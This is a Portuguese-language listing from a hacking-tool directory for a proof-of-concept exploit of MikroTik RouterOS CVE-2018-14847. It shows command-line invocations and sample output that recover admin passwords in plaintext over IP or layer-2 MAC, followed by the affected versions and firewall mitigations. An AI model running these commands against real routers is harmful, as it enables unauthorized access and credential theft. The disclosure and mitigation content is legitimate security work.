Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WinboxPoC — Prova de Conceito da Vulnerabilidade Crítica do Winbox (CVE-2018-14847) | Kitploit
Ferramentas/GitHubGitHub/basucert/winboxpoc
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança de RedeTestes de PenetraçãoArchived
GitHubbasucert/winboxpoc

WinboxPoC

Prova de Conceito da Vulnerabilidade Crítica do Winbox (CVE-2018-14847)

Ver Repositório
520461há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

WinboxExploit

Esta é uma prova de conceito da vulnerabilidade crítica do WinBox (CVE-2018-14847) que permite a leitura arbitrária de arquivos de senhas em texto puro.

A vulnerabilidade foi corrigida há muito tempo, portanto este projeto foi encerrado e não será mais suportado ou atualizado. Você pode fazer um fork e atualizá-lo por conta própria.

Postagem no Blog

https://n0p.me/winbox-bug-dissection/

Requisitos

  • Python 3+

Este script NÃO funcionará com Python 2.x ou inferior.

Como Usar

O script é usado de forma simples com argumentos simples na linha de comando.

WinBox (TCP/IP)

Explore a vulnerabilidade e leia a senha.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Exemplo:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

Servidor MAC WinBox (Camada 2)

Você pode extrair arquivos mesmo que o dispositivo não tenha um endereço IP.

Verificação simples de descoberta para dispositivos Mikrotik conectados localmente.

root@kitploit:~
python3 MACServerDiscover.py

Exemplo:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Explore a vulnerabilidade e leia a senha.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

Exemplo:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Versões Vulneráveis

Todas as versões do RouterOS de 28/05/2015 a 20/04/2018 são vulneráveis a este exploit.

Dispositivos Mikrotik executando versões do RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Para mais informações veja: https://blog.mikrotik.com/security/winbox-vulnerability.html

Técnicas de Mitigação

  • Atualize o roteador para uma versão do RouterOS que inclua a correção.
  • Desabilite o serviço WinBox no roteador.
  • Você pode restringir o acesso ao serviço WinBox para endereços IP específicos com o seguinte:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Você pode usar Regras de Filtro (ACL) para negar acesso externo ao serviço WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Limitar o acesso ao serviço mac-winbox pode ser feito especificando interfaces permitidas:
root@kitploit:~
/tool mac-server mac-winbox

Direitos Autorais

  • Patrocinado pela CERTCC do Irã (https://certcc.ir). Todos os direitos reservados.
Baixar ferramenta